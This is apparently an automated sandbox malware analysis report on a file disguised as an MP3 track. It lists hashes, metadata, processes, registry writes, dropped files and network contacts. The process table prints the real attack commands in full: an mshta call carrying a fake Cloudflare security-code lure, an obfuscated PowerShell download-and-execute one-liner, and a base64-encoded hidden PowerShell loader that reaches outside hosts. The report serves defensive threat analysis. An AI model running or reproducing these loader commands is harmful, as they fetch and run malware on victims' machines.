| download: | / |
| Full analysis: | https://app.any.run/tasks/16e40077-8dd2-4450-9b8a-ca1b72f912ef |
| Verdict: | Malicious activity |
| Analysis date: | April 04, 2025, 14:27:46 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Indicators: | |
| MIME: | audio/mpeg |
| File info: | Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, JntStereo |
| MD5: | 302B94F6F12924C80C448626F98E578B |
| SHA1: | 938AF1D0903AA81A6504C72EF3130C141E34E1C3 |
| SHA256: | 480DBECF96EE097D1B6CA930A05D8E8E4A1AE8F1BCFAB3885B48FAFBC77576B9 |
| SSDEEP: | 98304:nJI1ABLAc0xNxFqvaOYpCN+07C3dtHrsWPEtie38sc8T9VI7xQFxuPRsOWZbI+Fb:CB0ROrln9fhSbwiCGCuj5 |
| .mp3 | | | LAME encoded MP3 audio (ID3 v2.x tag) (62.5) |
|---|---|---|
| .mp3 | | | MP3 audio (ID3 v2.x tag) (37.5) |
| MPEGAudioVersion: | 1 |
|---|---|
| AudioLayer: | 3 |
| AudioBitrate: | 128 kbps |
| SampleRate: | 44100 |
| ChannelMode: | Joint Stereo |
| MSStereo: | Off |
| IntensityStereo: | Off |
| CopyrightFlag: | - |
| OriginalMedia: | |
| Emphasis: | None |
| VBRFrames: | 10893 |
| VBRBytes: | 7012757 |
| VBRScale: | 80 |
| Encoder: | LAME3.99r |
| LameVBRQuality: | 2 |
| LameQuality: | - |
| LameMethod: | VBR (new/mtrh) |
| LameLowPassFilter: | 18.5 kHz |
| LameBitrate: | 32 kbps |
| LameStereoMode: | Joint Stereo |
| Title: | chilltrap |
|---|---|
| Artist: | V-zen instrumental beat |
| Track: | 55 |
| RecordingTime: | 2019 |
| Genre: | chillhop |
| SourceURL: | |
| PublisherURL: | http://www.jamendo.com |
| Publisher: | http://www.jamendo.com |
| Composer: | V-zen instrumental beat |
| UserDefinedText: | (Tagging time) 2019-02-25T15:56:10 |
| EncodedBy: | Jamendo:http://www.jamendo.com| LAME |
| Comment: | http://www.jamendo.com cc_standard |
| FileURL: | http://www.jamendo.com/en/track/1624408 |
| ArtistURL: | http://www.jamendo.com/en/artist/343154 |
| CopyrightURL: | http://creativecommons.org/licenses/by-nc-nd/3.0/ |
| Copyright: | http://creativecommons.org/licenses/by-nc-nd/3.0/ |
| PictureMIMEType: | image/jpeg |
| PictureType: | Front Cover |
| PictureDescription: | - |
| Picture: | (Binary data 14627 bytes, use -b option to extract) |
| DateTimeOriginal: | 2019 |
|---|---|
| AudioBitrate: | 197 kbps |
| Duration: | 0:04:45 (approx) |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1244 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4164 | "C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Exec Unrestricted -C SI Variable:/YXJ 'https://cf.jolttapestry.fun/7456f63a46cc318334a70159aa3c4291';SV bD ([Net.WebClient]::New());Set-Variable y9g (((([Net.WebClient]::New()|Member)|Where{(GV _).Value.Name -clike'D*g'}).Name));(GV bD -ValueOnl).((GV y9g -Value))((Get-Variable YXJ).Value)|.( ''.SubString.ToString()[3,29,30]-Join'') | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5164 | "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -exec unrestricted -w 1 -File C:\Users\admin\AppData\Roaming\fjlsjiaubyvcrs.ps1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5868 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | svchost.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7920 | "C:\Windows\System32\mshta.exe" http://run.fox-chair-dust.xyz/ # "CIoudfIare Security Code: 5P2NB-MJ7C-8KV6-D2VWC" | C:\Windows\System32\mshta.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 11.00.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 8012 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -nop -ep un -E JABwAFEAeABNAHYAdwBzAHEAIAA9ACAAJwA2ADkANgA1ADcAOAA2ADgANwA0ADcANAA3ADAANwAzADMAQQAyAEYAMgBGADYARQA2AEYANwAwADYAMQA3ADMANwA0ADYANQAyAEUANgBFADYANQA3ADQAMgBGADYANgA2AEEANgBDADcAMwA2AEEANgA5ADYAMQA3ADUANgAyADcAOQA3ADYANgAzADcAMgA3ADMAMgBFADcAMAA3ADMAMwAxADIANAA3ADMANwA4ADcANQA0AEMANwA2ADIAMAAzAEQAMgAwADIANAA2ADUANgBFADcANgAzAEEANAAxADcAMAA3ADAANAA0ADYAMQA3ADQANgAxADMAQgA2ADYANwA1ADYARQA2ADMANwA0ADYAOQA2AEYANgBFADIAMAA3ADAANAA2ADQAQgA0ADgANgA1ADQAMgAyADgAMgA0ADQANgA2ADgANAA4ADYAOQAyAEMAMgAwADIANAA0ADEANAA0ADQANwA3ADgANAA0ADQANQA1AEEAMgA5ADcAQgA2ADMANwA1ADcAMgA2AEMAMgAwADIANAA0ADYANgA4ADQAOAA2ADkAMgAwADIARAA2AEYAMgAwADIANAA0ADEANAA0ADQANwA3ADgANAA0ADQANQA1AEEANwBEADMAQgA2ADYANwA1ADYARQA2ADMANwA0ADYAOQA2AEYANgBFADIAMAA2ADcANAAzADcAOQA0ADMANwAzADQARAA0ADUANwBBADIAOAAyADkANwBCADYANgA3ADUANgBFADYAMwA3ADQANgA5ADYARgA2AEUAMgAwADUANgA3ADUANQA0ADQANwA3ADkANwA1ADYAMQA2ADcAMgA4ADIANAA3ADAANQAxADcAOAA0AEQANwA2ADcANwA3ADMANwAxADIAOQA3AEIANgA5ADYANgAyADgAMgAxADIAOAA1ADQANgA1ADcAMwA3ADQAMgBEADUAMAA2ADEANwA0ADYAOAAyADAAMgBEADUAMAA2ADEANwA0ADYAOAAyADAAMgA0ADQAMQA0ADQANAA3ADcAOAA0ADQANAA1ADUAQQAyADkAMgA5ADcAQgA3ADAANAA2ADQAQgA0ADgANgA1ADQAMgAyADAAMgA0ADcAMAA1ADEANwA4ADQARAA3ADYANwA3ADcAMwA3ADEAMgAwADIANAA0ADEANAA0ADQANwA3ADgANAA0ADQANQA1AEEANwBEADcARAAyADQANAAxADQANAA0ADcANwA4ADQANAA0ADUANQBBADIAMAAzAEQAMgAwADIANAA2ADUANgBFADcANgAzAEEANAAxADcAMAA3ADAANAA0ADYAMQA3ADQANgAxADIAMAAyAEIAMgAwADIANwA1AEMANgA2ADYAQQA2AEMANwAzADYAQQA2ADkANgAxADcANQA2ADIANwA5ADcANgA2ADMANwAyADcAMwAyAEUANwAwADcAMwAzADEAMgA3ADMAQgA1ADYANwA1ADUANAA0ADcANwA5ADcANQA2ADEANgA3ADIAMAAyADQANQA0ADQAOAA0ADUANAA4ADYARQA2AEQAMgBFADUAMwA3ADUANgAyADUAMwA3ADQANwAyADYAOQA2AEUANgA3ADIAOAAzADMAMgBDADMAMwAzADgAMgA5ADMAQgA3ADAANgBGADcANwA2ADUANwAyADcAMwA2ADgANgA1ADYAQwA2AEMAMgBFADYANQA3ADgANgA1ADIAMAAyAEQANgA1ADcAOAA2ADUANgAzADIAMAA3ADUANgBFADcAMgA2ADUANwAzADcANAA3ADIANgA5ADYAMwA3ADQANgA1ADYANAAyADAAMgBEADcANwAyADAAMwAxADIAMAAyAEQANAA2ADYAOQA2AEMANgA1ADIAMAAyADQANAAxADQANAA0ADcANwA4ADQANAA0ADUANQBBADMAQgA3AEQANgA3ADQAMwA3ADkANAAzADcAMwA0AEQANAA1ADcAQQAzAEIAJwA7ACQAVABIAEUASABuAG0APQAnACcAOwAgAGYAbwByACgAJABpAD0AMAA7ACQAaQAgAC0AbAB0ACAAJABwAFEAeABNAHYAdwBzAHEALgBMAGUAbgBnAHQAaAA7ACQAaQArAD0AMgApAHsAJABUAEgARQBIAG4AbQArAD0AWwBjAGgAYQByAF0AKABbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEkAbgB0ADMAMgAoACQAcABRAHgATQB2AHcAcwBxAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkALAAyACkALAAxADYAKQApAH0AOwAgACYAIAAoACAAJABUAEgARQBIAG4AbQBbADAALgAuADIAXQAgAC0AagBvAGkAbgAgACcAJwAgACkAIAAoACAAJABUAEgARQBIAG4AbQBbADIAMgAuAC4AKAAkAFQASABFAEgAbgBtAC4ATABlAG4AZwB0AGgALQAxACkAXQAgAC0AagBvAGkAbgAgACcAJwAgACkA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | mshta.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 8020 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| (PID) Process: | (7920) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
| Operation: | write | Name: | CachePrefix |
Value: | |||
| (PID) Process: | (7920) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
| (PID) Process: | (7920) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
| Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
| (PID) Process: | (4164) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (4164) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableAutoFileTracing |
Value: 0 | |||
| (PID) Process: | (4164) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
| (PID) Process: | (4164) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | FileTracingMask |
Value: | |||
| (PID) Process: | (4164) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | ConsoleTracingMask |
Value: | |||
| (PID) Process: | (4164) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | MaxFileSize |
Value: 1048576 | |||
| (PID) Process: | (4164) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | FileDirectory |
Value: %windir%\tracing | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 7920 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\0PO2MYFN.mp3 | — | |
MD5:— | SHA256:— | |||
| 8012 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_0zvlewr1.wsw.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 4164 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3uzzk2es.hqs.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 5164 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_y0c3rigi.jg1.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 4164 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary | |
MD5:8E7D26D71A1CAF822C338431F0651251 | SHA256:495E7C4588626236C39124CCE568968E874BEDA950319BA391665B43DE111084 | |||
| 8012 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_wkh5dm4v.2f1.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 5164 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_qd1h5opw.hjb.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 5164 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:AFE6FCE31FD7D574BB314C317DC5D7DB | SHA256:A4DD71F2695D81C115CE4934FBA367B2035165E4F565FF4A772862B41E164B27 | |||
| 4164 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_bbdc4ewa.zya.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 8012 | powershell.exe | C:\Users\admin\AppData\Roaming\fjlsjiaubyvcrs.ps1 | text | |
MD5:20D8D688F642C10D5E822E4B77066E45 | SHA256:A04C635DEAD3EFFAB39362F70773D2ABBF6C6EEE2081B87D5849508AA53CC667 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
5496 | MoUsoCoreWorker.exe | GET | 200 | 23.48.23.145:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
6544 | svchost.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
1660 | SIHClient.exe | GET | 200 | 23.52.120.96:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
1660 | SIHClient.exe | GET | 200 | 23.52.120.96:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
7920 | mshta.exe | GET | 200 | 188.114.97.3:80 | http://run.fox-chair-dust.xyz/ | unknown | — | — | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
— | — | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
5496 | MoUsoCoreWorker.exe | 23.48.23.145:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
7920 | mshta.exe | 188.114.97.3:80 | run.fox-chair-dust.xyz | CLOUDFLARENET | NL | unknown |
3216 | svchost.exe | 172.172.255.217:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
6544 | svchost.exe | 40.126.32.76:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
6544 | svchost.exe | 2.17.190.73:80 | ocsp.digicert.com | AKAMAI-AS | DE | whitelisted |
8012 | powershell.exe | 174.138.125.138:443 | nopaste.net | DIGITALOCEAN-ASN | US | unknown |
2104 | svchost.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
run.fox-chair-dust.xyz |
| unknown |
client.wns.windows.com |
| whitelisted |
login.live.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
nopaste.net |
| unknown |
cf.jolttapestry.fun |
| unknown |
slscr.update.microsoft.com |
| whitelisted |